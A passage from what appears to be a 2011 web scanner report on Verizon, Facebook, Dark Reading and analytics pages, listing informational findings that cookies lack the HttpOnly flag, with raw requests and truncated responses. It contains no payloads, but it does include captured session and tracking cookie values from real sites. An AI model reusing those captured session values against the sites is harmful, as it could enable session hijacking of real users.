Cookie: __utma=94442777.1121161912.1313187517.1313187517.1313187517.1; __utmz=94442777.1313187517.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:14:40 GMT
Set-Cookie: TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e;Path=/;Domain=.tapad.com;Expires=Fri, 04-Nov-2011 22:14:40 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Length: 95
Content-Type: image/png
Server: Jetty(7.4.2.v20110526)

.PNG
.
...IHDR.............%.V.....PLTE....z=.....tRNS.@..f...
IDAT..c`.......!.3....IEND.B`.

10.99. http://webmail.verizon.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.com
Path:   /signin/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:18:35 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:18:35 GMT
Content-Length: 17185


<html>
<head>
   <title>Verizon | My Verizon 2.0 | Webmail</title>
   

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta HT
...[SNIP]...

10.100. http://webmail.verizon.net/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:19:04 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:19:03 GMT
Content-Length: 19268


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...

10.101. http://webmail.verizon.net/signin/Login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/Login.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signin/Login.jsp?src=SAM&err=1011 HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=284C4BA4247C07559CC0CBDE7C05939B; webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; amlbcookie=03

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=1"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:39:25 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:39:25 GMT
Content-Length: 19468


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...

10.102. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s53773487436119

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /b/ss/pcwhitefencecom/1/H.21/s53773487436119

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwhitefencecom/1/H.21/s53773487436119?AQB=1&ndh=1&t=5/8/2011%2022%3A38%3A47%201%20300&ns=whitefence&pageName=ConnectToVerizon-Login_Failed&g=http%3A//www.connecttoverizon.com/loginFailed.html%3Funame%3D%26Submit.x%3D91%26Submit.y%3D17%26loginPageUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%26Submit%3DSubmit%26loginFailedUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%252FloginFailed.html%26id%3D1053268&r=http%3A//www.connecttoverizon.com/loginFailed.html%3Funame%3Dxss%26Go.x%3D26%26Go.y%3D3%26loginPageUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%26Go%3DSubmit%26loginFailedUrl%3Dhttp%253A%252F%252Fwww.connecttoverizon.com%252FloginFailed.html%26id%3D1053268&cc=USD&c1=1053268&v1=1053268&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=874&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=ConnectToVerizon-Login_Failed&pidt=1&oid=http%3A//www.connecttoverizon.com/objects/images/spacer.gif&ot=IMAGE&AQE=1 HTTP/1.1
Host: whitefence.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/loginFailed.html?uname=&Submit.x=91&Submit.y=17&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Submit=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi=[CS]v1|2732A56F050113D4-60000101403355AE[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:38:53 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Flxxgfx7Bjijaljlx60b=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=whitefence.112.2o7.net; Path=/
Set-Cookie: s_vi_x7Flxxgfx7Bjijaljlx60b=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi=[CS]v1|2732A56F050113D4-60000101403355AE|x7Flxxgfx7Bjijaljlx60b|2732A76805160411-600001A3402E5C46[CE]; Expires=Sat, 3 Sep 2016 22:38:53 GMT; Domain=whitefence.112.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 04 Sep 2011 22:38:53 GMT
Last-Modified: Tue, 06 Sep 2011 22:38:53 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E654F7D-28D4-0BB7FCF7"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www633
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.103. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /b/ss/pcwhitefencecom/1/H.21/s59195406346116

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwhitefencecom/1/H.21/s59195406346116 HTTP/1.1
Host: whitefence.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Flxxgfx7Bjijaljlx60b=[CS]v4|2732A76805160411-600001A3402E5C46|4E654ED0[CE]; Expires=Sat, 3 Sep 2016 22:36:00 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 04 Sep 2011 22:36:00 GMT
Last-Modified: Tue, 06 Sep 2011 22:36:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E654ED0-0807-7CA57AFB"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www626
Content-Length: 43
Content-Type: image/gif
Connection: close

GIF89a.............!.......,............Q.;

10.104. http://www.darkreading.com/security/attacks/showArticle.jhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /security/attacks/showArticle.jhtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 05 Sep 2011 22:36:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 22:38:09 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/security/attacks/showArticle.jhtml&gateway=true
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...

10.105. http://www.facebook.com/dialog/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/feed

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.54
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 14722

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="EcbK";</script><meta
...[SNIP]...

10.106. http://www.verizonbusiness.com/Medium/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "4d375cecad1a1676dcb66aae637de263"
Last-Modified: Mon, 05 Sep 2011 22:16:42 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 35613
Date: Mon, 05 Sep 2011 22:16:42 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262202|VP%3d2|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:20:26 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:16:42 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.107. http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/about/promotions/first_6_months/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/about/promotions/first_6_months/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "62932d88f61687f6e484410ff7172a0e"
Last-Modified: Mon, 05 Sep 2011 22:36:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:32 GMT
Content-Length: 22487
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d55|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.108. http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/about/promotions/premium_data_center/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/about/promotions/premium_data_center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:31 GMT
Server: Roxen/4.5.146-release3
ETag: "d7a0245de1dca5084bcaad7d1d441f84"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:31 GMT
Content-Length: 23185
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263391|VP%3d56|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.109. http://www.verizonbusiness.com/Medium/about/promotions/smp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/about/promotions/smp/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/about/promotions/smp/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:25 GMT
Server: Roxen/4.5.146-release3
ETag: "fa4aac09eac1b44b937f28b8ee8342f9"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:25 GMT
Content-Length: 25238
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d54|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:25 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.110. http://www.verizonbusiness.com/Medium/bundles/vsbb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/bundles/vsbb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/bundles/vsbb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "dbb3cfabe4229776e81ce03219b6376e"
Last-Modified: Mon, 05 Sep 2011 22:36:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263378|VP%3d49|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:02 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:18 GMT
Content-Length: 34610

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.111. http://www.verizonbusiness.com/Medium/products/conferencing/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/conferencing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:27 GMT
Server: Roxen/4.5.146-release3
ETag: "682b2e7de0b0c4aafcb1f140c307ad94"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:27 GMT
Content-Length: 24168
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263387|VP%3d52|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:11 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:27 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.112. http://www.verizonbusiness.com/Medium/products/internet/ida/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/internet/ida/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/internet/ida/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:20 GMT
Server: Roxen/4.5.146-release3
ETag: "1ffc9ee9f2c2d58d7b4cf59683dda86b"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:21 GMT
Content-Length: 25699
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263380|VP%3d50|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:20 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.113. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/itinfrastructure/computing/caas_smb/video/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:36:20 GMT
Server: Roxen/4.5.146-release3
ETag: "65353037b41c6496f3ab15c2110ba95e"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:20 GMT
Content-Length: 12542
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263380|VP%3d51|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:20 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.114. http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/managed/managed_mobility/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/products/managed/managed_mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "377ad8868d28add230d79bce2286f6a6"
Last-Modified: Mon, 05 Sep 2011 22:36:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:36:25 GMT
Content-Length: 25367
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263385|VP%3d53|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:09 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:36:25 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...

10.115. http://www.verizonbusiness.com/Medium/sign-in/vec/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Medium/sign-in/vec/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
